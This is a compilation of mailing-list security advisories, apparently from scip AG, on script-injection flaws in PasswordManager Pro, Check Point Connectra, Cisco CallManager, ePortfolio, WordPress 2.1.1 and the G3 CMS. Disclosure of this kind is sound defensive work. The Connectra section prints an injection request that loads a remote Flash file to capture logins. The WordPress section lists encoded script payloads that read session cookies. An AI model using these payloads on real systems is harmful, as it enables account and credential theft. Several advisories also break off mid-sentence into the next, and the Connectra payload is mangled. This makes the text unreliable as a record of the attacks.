[Full-disclosure] [scip-Advisory 4063] PasswordManager Pro 6.1 Script Injection Vulnerability
PasswordManager Pro 6.1 Script Injection Vulnerability
scip AG Vulnerability ID 4063 (12/15/2009)
http://www.scip.ch/?vuldb.4063
I. INTRODUCTION
"Password Manager Pro is a secure vault for storing and managing shared
sensitive information such as passwords, documents and digital
identities of enterprises."
More information is available on the official product web site at the
following URL[1]:
http://www.manageengine.com/products/passwordmanagerpro/
II. DESCRIPTION
Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.
The processing method for the search function fails to perform proper
input validation on the data that is being submitted via HTTP GET. The
parameter "searchtext" lacks validation and is therefore vulnerable to
script injection. While there is a basic input filterting method in
place, it fails to detect more advanced (e.g. encoded) payloads.
Other parts of the application might be affected too.
This vulnerability has been tested on version 6.1, other versions might
be affected as well.
III. EXPLOITATION
Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using easy exploiting strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not
being detected by the filter in place, allowing you execute any
arbitrary, externally hosted payload.
Exploitation can be performed using any medium, that is able to perform
a GET request. Under certain circumstances, it is even possible to
attack unauthenticated user, as the payload will be kept in the users
session until authentication data has been entered.
We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.
IV. IMPACT
Impact of the vulnerability depends on the stored data. PMP is often
used for corporate password management and contains highly sensitive
information. Therefore, a high amount of damage might be caused by
successful exploitation and follow-up attacks.
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like
[Full-disclosure] [scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020
I. INTRODUCTION
Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.
More information is available on the official product web site at the
following URL[1]:
http://www.checkpoint.com/products/connectra/index.html
II. DESCRIPTION
Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.
The initial logon script at /Login/Login, that is being used for
unauthenticated users to log in, fails to perform proper input
validation on the data that is being submitted via HTTP POST. While
certain fields are escaped before being sent back to users browser, the
parameter "vpid_prefix" lacks any validation and is therefore vulnerable
to script injection.
Other parts of the application might be affected too.
This vulnerability has been tested on version R62, other versions might
be affected as well.
III. EXPLOITATION
Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using easy exploiting strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not
being detected by the filter in place, allowing you execute any
arbitrary, externally hosted payload.
We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.
Vulnerable Variable Value:
vpid_prefix = ">http://www.scip.ch/p/s/w/ccs.swf";
allowScriptAccess=always>https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153
loginType=Standard&userName=&vpid_prefix=">http://www.scip.c
h/p/s/w/ccs.swf"
allowScriptAccess=always>http://www.scip.ch/p/s/w/ccs.swf";
allowScriptAccess=always>
--- CUT END ---
IV. IMPACT
Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attacks.
Due to the fact that the application will often be allowed to make use
of ActiveX, it can also be used as a springboard to inject other
payloads, for example MS09-037[3] or any other vulnerability disclosed
lately, that might be exploited using a web browser.
Because other parts of the application might be affected too - this
could include some second order vulnerabilities - a severe attack
scenario might be possible.
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like
[Full-disclosure] Cisco CallManager 4.1 Input Validation Vulnerability
Cisco CallManager 4.1 Input Validation Vulnerability scip AG Vulnerability ID 2977 (03/13/2007) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2977 I. INTRODUCTION Cisco CallManager, short CCM, is a professional voice-over-IP solution that tracks active components, including among others phones, gateways, conference bridges, transcoding resources and voicemail boxes. II. DESCRIPTION Marc Ruef and Stefan Friedli found a web-based vulnerability that was identified in Cisco CallManager 4.1 and may affect earlier versions as well. The web interface of the application fails to properly santisize data supplied by the search-form before displaying it back to the user. Though several filters are in place to prevent the injection of
[Full-disclosure] ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities scip AG Vulnerability ID 2893 (12/22/2006) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893 I. INTRODUCTION ePortfolio is a e-banking application by TKS Banking Solutions. More information is available on the vendors web site at the following URL: http://www.tksbankingsolutions.com/ II. DESCRIPTION Stefan Friedli found several web-based vulnerabilities that were identified in ePortfolio version 1.0 Java and may affect earlier versions as well. The application uses heavy amounts of javascript code for operation. As this is not generally a bad thing, it causes massive problems when it comes to data validation. As we recognized, the entire validation of input is realized by client-side javascript which can easily be bypassed using a Proxy BURPproxy or WebScarab to modify original requests sent (and validated) by the browser. We assume this vulnerability to exist in nearly every form offered by the application. Due to the limited functionality of the account used for testing, we're not able to definitely confirm or deny this fact. PoC Code is not being published. IV. IMPACT As there is a serious lack of server-side measured to protect the application from malicious input, an attacker may realize nearly every attack that relies on lacking input-validation which includes Cross Site Scripting and Cross-Site Request Forgery (Session Riding) . V. DETECTION Detection of web based attacks requires a specialized web proxy and/or intrusion detection system. Patterns for detection of basic attacks are available and easy to implement, though they may possibly fail on more sophisticated attacks. VI. SOLUTION Server-side input validation should be provied by the application vendor as soon as possible. VII. VENDOR RESPONSE The problems were recognized and will, according to the vendor, be adressed with the next release by the end of this week. Further, the vendor claims to be able to change the faulty behaviour remotely or by editing a non-specified file for existing customers. VIII. SOURCES scip AG - Security Consulting Information Process (german) http://www.scip.ch scip AG Vulnerability Database (german) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893 IX. DISCLOSURE TIMELINE 12/22/06 Identification of the vulnerabilities 02/05/07 Notification of the vendor 03/02/07 Vendor Response 03/02/07 Release of public advisory IX. CREDITS The vulnerabilities were discovered by Stefan Friedli. Stefan Friedli, scip AG, Zuerich, Switzerland stfr-at-scip.ch http://www.scip.ch A2. LEGAL NOTICES Copyright (c) 2007 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.0.6 iQA/AwUBRewVwVJ79Mw3xa1EEQImugCeI1Jzz612APrcXkzzIGsuHPB/xz0An3oD j48MiupM2jtTyTp08Oukqkvi =ftmv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities scip AG Vulnerability ID 2962 (02/27/2007) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962 I. INTRODUCTION "WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability." More information is available on the project web site at the following URL: http://www.wordpress.org II. DESCRIPTION Stefan Friedli found several vulnerabilities based on an advisory entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender" which described a lack of input validation when deleting posts that allows injection of arbitrary code. The vulnerability was reported on February, 26th and is referenced in section VII. Further to this vulnerability which was limited on manipulating the "post"-parameter, there are several other vulnerabilities which are very similar to the one mentioned above. Every operation that makes use of the common confirm-dialog is vulnerable for this type of attack. Possible injection... ... when deleting posts as mentioned in Samenspenders advisory (unvalidated parameter: post, file: post.php) http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting comments (unvalidated parameter: c, file: comment.php) http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting pages (unvalidated parameter: page, file: page.php) http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting categories (unvalidated parameter: cat_ID, file: categories.php) http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting comments (unvalidated parameter: c, file: comment.php) http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E IV. IMPACT This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the "Delete Post"-function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site-scripting or any other webbased exploitation. V. DETECTION This flaws can be detected by using any web browser. VI. SOLUTION Until these issues are patched, possible workarounds are manual fixing or the usage of a application level filter like mod_security for Apache. VII. SOURCES Samenspender - WordPress AdminPanel CSRF/XSS - 0day http://seclists.org/bugtraq/2007/Feb/0494.html scip AG - Security Consulting Information Process (german) http://www.scip.ch scip AG Vulnerability Database (german) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962 IX. DISCLOSURE TIMELINE 02/26/06 Release of "Delete Post"-Confirmation Vulnerability 02/27/06 Identification of further vulnerabilities 02/27/06 Immediated Release for informational purposes IX. CREDITS The vulnerabilities were discovered by Stefan Friedli. Stefan Friedli, scip AG, Zuerich, Switzerland stfr-at-scip.ch http://www.scip.ch A2. LEGAL NOTICES Copyright (c) 2007 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.0.6 iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS oTWNsT+cOMwFq+XKsZqq6yJ/ =REO6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function
Content Management Framework "G3" - XSS Vulnerability in Search FunctionINTROAccording to the manufacturer, "G3" is a classic content-management-system, allowing customers to manage their own websites without knowing much about webpublishing. Information about the product is available at:http://www.inm.ch/g3.cms/s_page/56770DESCRIPTIONStefan Friedli discovered a XSS Vulnerabilty in the search module used by many websites powered by G3. By using the chars "<" ">" and quotes, the form can be used to include script code. As there seems to be no determination between parameters being passed by GET or POST, it's possible to pass manipulated content to other users using a simple link passing the parameter search_string. EXPLOITClassic browser-based script injection techniques are sufficient to exploit this vulnerability.POSSIBLE IMPACTAs most XSS vulnerabilities, the impact of this flaw depends on the page being attacked. In this case, a "trusted" site may be used to exploit vulnerabilities in older browsers or compromise accounts on sites using authentication. For several customers of INM, this flaw could cause some additional trouble because of possible phising attacks using this vulnerability to trick customers. SOLUTIONThe vulnerabilty has not been addressed yet. A patch implementing basic input validation would solve the problem.VENDOR RESPONSEINM has been informed about this vulnerability on 2006-07-06. A reminder was sent 14 days after. There has been no reaction on any message according this issue. TIMELINE2006-07-05 - Discovery2006-07-06 - INM has been informed about the flaw2006-07-20 - Reminder has been sent2006-08-02 - Public advisory has been publishedCREDITSThis vulnerabilty was discovered by Stefan Friedli. It may be redistributed as-is. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
